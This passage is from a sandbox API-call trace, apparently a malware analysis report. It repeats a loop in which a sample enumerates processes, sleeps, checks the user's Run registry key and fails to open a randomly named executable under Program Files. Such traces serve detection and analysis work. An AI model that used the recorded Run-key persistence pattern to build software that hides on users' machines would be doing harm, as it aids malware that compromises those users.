BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.403] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.410] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.410] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.410] NtClose (Handle=0x14c) returned 0x0 [0263.410] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.410] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.410] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.411] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.411] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.539] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.550] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.550] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.550] NtClose (Handle=0x14c) returned 0x0 [0263.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.551] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.551] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.551] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.551] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.551] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.656] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.659] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.659] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.659] NtClose (Handle=0x14c) returned 0x0 [0263.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.659] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.660] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.660] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.660] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.754] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.769] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.769] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.769] NtClose (Handle=0x14c) returned 0x0 [0263.770] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.770] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.770] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.770] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.770] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.770] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.871] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.878] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.878] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.878] NtClose (Handle=0x14c) returned 0x0 [0263.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.879] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.879] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.879] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.879] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0263.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0263.969] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0263.972] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0263.973] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0263.973] NtClose (Handle=0x14c) returned 0x0 [0263.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.973] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.973] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.973] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.973] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.973] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0263.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0263.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.069] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.090] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.091] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.091] NtClose (Handle=0x14c) returned 0x0 [0264.091] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.091] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.091] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.091] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.091] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.091] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0264.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0264.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0264.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0264.192] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0264.205] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0264.206] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0264.206] NtClose (Handle=0x14c) returned 0x0 [0264.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0264.206] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0264.206] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 